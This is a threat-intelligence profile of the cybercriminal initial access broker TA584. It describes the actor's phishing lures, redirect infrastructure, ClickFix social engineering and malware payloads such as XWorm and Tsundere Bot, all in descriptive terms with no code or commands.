TA584

TA584 is a prolific cybercriminal initial access broker tracked by Proofpoint since 2020 and assessed to overlap with Microsoft’s Storm-0900 cluster. The actor conducts high-volume, email-centric phishing campaigns to obtain initial access that can enable follow-on ransomware and data theft. Proofpoint describes TA584 as one of its most prominent cybercriminal threat actors. TA584 targets organizations globally and historically focused on North America, the UK, and Ireland, later expanding targeting to Germany, other European countries, and Australia. The actor is described as opportunistic rather than sector-specific, but frequently impersonates healthcare organizations and government entities, as well as recruiting firms, business services, and well-known brands. Reported lure themes include parking tickets, medical test results, tax obligations, payments, business complaints, and other urgent notifications. Observed tradecraft includes phishing emails sent from compromised aged accounts and sometimes via SendGrid or Amazon SES; per-target unique URLs; geofencing and IP filtering; redirect chains using traffic direction systems including 404 TDS, Keitaro, and historically Cookie Reloaded/Prometheus TDS; CAPTCHA-gated landing pages; and, from late July 2025, ClickFix social engineering that instructs victims to copy, paste, and run PowerShell commands. Proofpoint reported TA584 campaigns often last only hours to days and rapidly rotate lures, infrastructure, and delivery methods. TA584 has delivered multiple payloads over time, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT, XWorm, and Tsundere Bot. In 2025, Proofpoint reported XWorm with configuration "P0WER" as the primary payload and observed TA584 distributing Tsundere Bot from late November 2025. TA584 has been observed using Tsundere Bot alongside the XWorm remote access trojan to gain network access that could lead to ransomware attacks. The Tsundere Bot activity associated with TA584 used PowerShell-based execution chains that loaded malware into memory. Reporting describes Tsundere Bot as a malware-as-a-service backdoor/loader that gathers system information, can execute arbitrary code, requires Node.js, retrieves command-and-control information from the Ethereum blockchain using an EtherHiding-like technique, and communicates over WebSockets. Tsundere Bot also checks system locale and exits on CIS-language systems. Proofpoint assessed with high confidence that TA584 infections can lead to ransomware and stated TA584 is likely connected to the Russian cybercriminal ecosystem. Known aliases in the provided content: Storm-0900.